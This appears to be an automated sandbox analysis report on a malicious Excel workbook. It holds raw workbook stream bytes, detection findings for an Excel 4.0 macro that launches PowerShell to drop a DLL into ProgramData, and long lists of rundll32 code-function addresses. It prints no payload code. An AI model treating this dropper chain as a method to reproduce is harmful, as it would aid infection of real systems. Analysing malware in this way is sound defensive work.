............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ...ff....... ......+... ............ ......)... ............ ......,... ............ ......*... ............ .......... ............ .......... ............ .......... ............ .......... ....P....... .......... ....P....... .......
Source: 2022-28-01_1202.xls.0.dr Stream path 'Workbook' : ........ZO..........................\.p....user B.....a.........=...........................................=........p.08.......X.@...........".......................1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1.*.h...6........<..C.a.l.i.b.r.i. .L.i.g.h.t.1...,...6........<..C.a.l.i.b.r.i.1.......6........<..C.a.l.i.b.r.i.1.......6........<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1.......<........<..C.a.l.i.b.r.i.1.......>........<..C.a.l.i.b.r.i.1.......?........<..C.a.l.i.b.r.i.1.......4........<..C.a.l.i.b.r.i.1.......4........<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..A.r.i.a.l...3......#.,.#.#.0.\. .".. ".;.\.-.#.,.#.#.0.\. .".. "...=......#.,.#.#.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0.\. .".. "...?......#.,.#.#.0...0.0.\. .".. ".;.\.-.#.,.#.#.0...0.0.\. .".. "...I..."..#.,.#.#.0...0.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0...0.0.\. .".. "...q.*.6.._.-.*. .#.,.#.#.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0.\. .".. "._.-.;._.-.*. .".-.".\. .".. "._.-.;._.-.@._.-...,.).'.._-* #,##0_-;\-* #,##0_-;_-* "-"_-;_-@_-....,.>.._.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;._.-.*. .".-.".?.?.\. .".. "._.-.;._.-.@._.-...4.+./.._-* #,##0.00_-;\-* #,##0.00_-;_-* "-"??_-;_-@_-..?...:.._("$"* #,##0.00_);_("$"* \(#,##0.00\);_("$"* "-"??_);_(@_).......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ...ff....... ......+... ............ ......)... ............ ......,... ............ ......*... ............ .......... ............ .......... ............ .......... ............ .......... ....P....... .......... ....P....... .......
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\ProgramData\JooSee.dll Jump to dropped file
Found Excel 4.0 Macro with suspicious formulas
Source: 2022-28-01_1202.xls Initial sample: EXEC
Source: 2022-28-01_1202.xls Initial sample: EXEC
Detected potential crypto function
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10036007 9_2_10036007
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10041050 9_2_10041050
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003130F 9_2_1003130F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100323E2 9_2_100323E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10030460 9_2_10030460
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10041592 9_2_10041592
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003E59F 9_2_1003E59F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003960C 9_2_1003960C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100317E2 9_2_100317E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10040B0E 9_2_10040B0E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10031BB6 9_2_10031BB6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10041C56 9_2_10041C56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10036CB5 9_2_10036CB5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1001CD16 9_2_1001CD16
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10042D21 9_2_10042D21
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10031FC2 9_2_10031FC2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0037F8FD 9_2_0037F8FD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0037E991 9_2_0037E991
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0037AB87 9_2_0037AB87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00379011 9_2_00379011
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00380001 9_2_00380001
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0038907F 9_2_0038907F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00372051 9_2_00372051
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00390056 9_2_00390056
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003820BA 9_2_003820BA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003770B3 9_2_003770B3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0037F09B 9_2_0037F09B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00384116 9_2_00384116
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003781B7 9_2_003781B7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003751BB 9_2_003751BB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00372251 9_2_00372251
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0038A2E8 9_2_0038A2E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0037B2C7 9_2_0037B2C7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0037E2CC 9_2_0037E2CC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00375361 9_2_00375361
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00374346 9_2_00374346
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003913AD 9_2_003913AD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0038C3A0 9_2_0038C3A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0038E395 9_2_0038E395
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0038D389 9_2_0038D389
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0038F435 9_2_0038F435
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0038044F 9_2_0038044F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003764E2 9_2_003764E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00388519 9_2_00388519
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0037A55F 9_2_0037A55F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00382550 9_2_00382550
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00375548 9_2_00375548
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003895FA 9_2_003895FA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0037E5CF 9_2_0037E5CF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0038C631 9_2_0038C631
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00388606 9_2_00388606
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0038A666 9_2_0038A666
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0037D6D8 9_2_0037D6D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003866CA 9_2_003866CA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00377735 9_2_00377735
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0038473C 9_2_0038473C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00379714 9_2_00379714
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0038176B 9_2_0038176B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0037B74D 9_2_0037B74D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00374816 9_2_00374816
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00381889 9_2_00381889
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00378969 9_2_00378969
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0038894B 9_2_0038894B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003909B5 9_2_003909B5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003759F2 9_2_003759F2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0038AA30 9_2_0038AA30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00371A56 9_2_00371A56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0037EA99 9_2_0037EA99
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00378B3D 9_2_00378B3D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0038BB23 9_2_0038BB23
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00380B19 9_2_00380B19
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0037BB7E 9_2_0037BB7E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0038CB5B 9_2_0038CB5B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00387BA6 9_2_00387BA6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00379B83 9_2_00379B83
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00384B87 9_2_00384B87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0038DBEA 9_2_0038DBEA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00388BE3 9_2_00388BE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00372BD9 9_2_00372BD9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00389BCF 9_2_00389BCF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00377C37 9_2_00377C37
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0038AC3A 9_2_0038AC3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00373C3C 9_2_00373C3C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00390C14 9_2_00390C14
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00374C5D 9_2_00374C5D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00386C49 9_2_00386C49
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0038DCF7 9_2_0038DCF7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00385CC4 9_2_00385CC4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00376D24 9_2_00376D24
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00386DF8 9_2_00386DF8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00387DD5 9_2_00387DD5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00379DCF 9_2_00379DCF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00390E3A 9_2_00390E3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00373E3F 9_2_00373E3F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0038BE27 9_2_0038BE27
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0038AE6D 9_2_0038AE6D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00375E60 9_2_00375E60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00380E53 9_2_00380E53
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0037EE81 9_2_0037EE81
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0037AEFB 9_2_0037AEFB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00389EEC 9_2_00389EEC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00374EE3 9_2_00374EE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0038DEDC 9_2_0038DEDC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00390F33 9_2_00390F33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0037CF47 9_2_0037CF47
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0037DFF3 9_2_0037DFF3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00377FF2 9_2_00377FF2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00373C3C 10_2_00373C3C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00379011 10_2_00379011
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0038044F 10_2_0038044F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003820BA 10_2_003820BA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0037F8FD 10_2_0037F8FD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0037D6D8 10_2_0037D6D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00384116 10_2_00384116
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003913AD 10_2_003913AD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0037AB87 10_2_0037AB87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003895FA 10_2_003895FA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003759F2 10_2_003759F2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00377FF2 10_2_00377FF2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00377C37 10_2_00377C37
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0038AC3A 10_2_0038AC3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00390E3A 10_2_00390E3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0038AA30 10_2_0038AA30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00373E3F 10_2_00373E3F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0038C631 10_2_0038C631
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0038F435 10_2_0038F435
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0038BE27 10_2_0038BE27
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00374816 10_2_00374816
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00390C14 10_2_00390C14
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00380001 10_2_00380001
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00388606 10_2_00388606
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0038907F 10_2_0038907F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0038AE6D 10_2_0038AE6D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00375E60 10_2_00375E60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0038A666 10_2_0038A666
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00371A56 10_2_00371A56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00372051 10_2_00372051
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00372251 10_2_00372251
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00374C5D 10_2_00374C5D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00380E53 10_2_00380E53
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00390056 10_2_00390056
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00386C49 10_2_00386C49
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003770B3 10_2_003770B3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0037F09B 10_2_0037F09B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0037EA99 10_2_0037EA99
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00381889 10_2_00381889
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0037EE81 10_2_0037EE81
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0037AEFB 10_2_0037AEFB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0038DCF7 10_2_0038DCF7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0038A2E8 10_2_0038A2E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00389EEC 10_2_00389EEC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00374EE3 10_2_00374EE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003764E2 10_2_003764E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0038DEDC 10_2_0038DEDC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0037B2C7 10_2_0037B2C7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003866CA 10_2_003866CA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0037E2CC 10_2_0037E2CC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00385CC4 10_2_00385CC4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00377735 10_2_00377735
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0038473C 10_2_0038473C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00390F33 10_2_00390F33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00378B3D 10_2_00378B3D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00376D24 10_2_00376D24
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0038BB23 10_2_0038BB23
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00388519 10_2_00388519
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00380B19 10_2_00380B19
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00379714 10_2_00379714
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0037BB7E 10_2_0037BB7E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0038176B 10_2_0038176B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00375361 10_2_00375361
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00378969 10_2_00378969
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0038CB5B 10_2_0038CB5B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0037A55F 10_2_0037A55F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00382550 10_2_00382550
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0037CF47 10_2_0037CF47
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00374346 10_2_00374346
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0038894B 10_2_0038894B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0037B74D 10_2_0037B74D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00375548 10_2_00375548
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003781B7 10_2_003781B7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003909B5 10_2_003909B5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003751BB 10_2_003751BB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0038C3A0 10_2_0038C3A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00387BA6 10_2_00387BA6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0037E991 10_2_0037E991
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0038E395 10_2_0038E395
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0038D389 10_2_0038D389
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00379B83 10_2_00379B83
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00384B87 10_2_00384B87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00386DF8 10_2_00386DF8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0037DFF3 10_2_0037DFF3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0038DBEA 10_2_0038DBEA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00388BE3 10_2_00388BE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00387DD5 10_2_00387DD5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00372BD9 10_2_00372BD9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00389BCF 10_2_00389BCF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00379DCF 10_2_00379DCF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0037E5CF 10_2_0037E5CF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10036007 11_2_10036007
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10041050 11_2_10041050
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003130F 11_2_1003130F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_100323E2 11_2_100323E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10030460 11_2_10030460
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10041592 11_2_10041592
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003E59F 11_2_1003E59F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003960C 11_2_1003960C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_100317E2 11_2_100317E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10040B0E 11_2_10040B0E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10031BB6 11_2_10031BB6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10041C56 11_2_10041C56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10036CB5 11_2_10036CB5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1001CD16 11_2_1001CD16
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10042D21 11_2_10042D21
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10031FC2 11_2_10031FC2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0027F8FD 11_2_0027F8FD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0027E991 11_2_0027E991
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0027AB87 11_2_0027AB87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00280001 11_2_00280001
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00279011 11_2_00279011
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0028907F 11_2_0028907F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00272051 11_2_00272051
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00290056 11_2_00290056
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002820BA 11_2_002820BA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002770B3 11_2_002770B3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0027F09B 11_2_0027F09B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00284116 11_2_00284116
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002781B7 11_2_002781B7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002751BB 11_2_002751BB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00272251 11_2_00272251
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0028A2E8 11_2_0028A2E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0027B2C7 11_2_0027B2C7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0027E2CC 11_2_0027E2CC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00275361 11_2_00275361
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00274346 11_2_00274346
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002913AD 11_2_002913AD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0028C3A0 11_2_0028C3A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0028D389 11_2_0028D389
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0028E395 11_2_0028E395
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0028F435 11_2_0028F435
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0028044F 11_2_0028044F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002764E2 11_2_002764E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00288519 11_2_00288519
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00275548 11_2_00275548
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0027A55F 11_2_0027A55F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00282550 11_2_00282550
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002895FA 11_2_002895FA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0027E5CF 11_2_0027E5CF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0028C631 11_2_0028C631
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00288606 11_2_00288606
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0028A666 11_2_0028A666
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002866CA 11_2_002866CA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0027D6D8 11_2_0027D6D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00277735 11_2_00277735
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0028473C 11_2_0028473C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00279714 11_2_00279714
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0028176B 11_2_0028176B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0027B74D 11_2_0027B74D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00274816 11_2_00274816
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00281889 11_2_00281889
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00278969 11_2_00278969
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0028894B 11_2_0028894B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002909B5 11_2_002909B5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002759F2 11_2_002759F2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0028AA30 11_2_0028AA30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00271A56 11_2_00271A56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0027EA99 11_2_0027EA99
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0028BB23 11_2_0028BB23
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00278B3D 11_2_00278B3D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00280B19 11_2_00280B19
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0027BB7E 11_2_0027BB7E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0028CB5B 11_2_0028CB5B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00287BA6 11_2_00287BA6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00279B83 11_2_00279B83
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00284B87 11_2_00284B87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0028DBEA 11_2_0028DBEA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00288BE3 11_2_00288BE3
